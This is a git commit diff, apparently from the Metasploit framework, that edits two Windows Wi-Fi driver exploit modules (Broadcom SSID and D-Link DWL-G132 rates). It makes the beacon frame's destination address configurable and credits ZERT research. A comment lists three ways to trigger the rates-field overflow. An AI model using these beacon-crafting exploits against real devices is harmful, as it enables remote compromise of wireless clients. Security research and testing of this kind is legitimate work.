Better credit to Gil in the comments, made ADDR_DST do something
git-svn-id: file:///home/svn/framework3/trunk@4141 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
2ce2ff8a3a
commit
5c0176e2dd
|
@ -153,7 +153,7 @@ class Exploits::Windows::Driver::Broadcom_WiFi_SSID < Msf::Exploit::Remote
|
|||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
"\x58\x58\x58\x58\x58\x58" + # src
|
||||
"\x58\x58\x58\x58\x58\x58" + # bssid
|
||||
"\x70\xed" + # sequence number
|
||||
|
|
|
@ -137,12 +137,15 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
end
|
||||
|
||||
|
||||
#
|
||||
# The following research was provided by Gil Dabah of ZERT
|
||||
#
|
||||
# The long rates field bug can be triggered three different ways (at least):
|
||||
# 1) Send a single rates IE with valid rates up front and long data
|
||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data (thanks gil!)
|
||||
# 2) Send a single rates IE field with valid rates, follow with IE type 0x32 with long data
|
||||
# 3) Send two IE rates fields, with the second one containing the long data (this exploit)
|
||||
#
|
||||
|
||||
def create_beacon
|
||||
|
||||
ssid = Rex::Text.rand_text_alphanumeric(6)
|
||||
|
@ -158,9 +161,9 @@ class Exploits::Windows::Driver::DLink_DWL_G132_WiFi_Rates < Msf::Exploit::Remot
|
|||
"\x80" + # type/subtype
|
||||
"\x00" + # flags
|
||||
"\x00\x00" + # duration
|
||||
"\xff\xff\xff\xff\xff\xff" + # dst
|
||||
eton(datastore['ADDR_DST']) + # dst
|
||||
src + # src
|
||||
bssid + # bssid
|
||||
bssid + # bssid
|
||||
seq + # seq
|
||||
Rex::Text.rand_text(8) + # timestamp value
|
||||
"\x64\x00" + # beacon interval
|
||||
|
|
Loading…
Reference in New Issue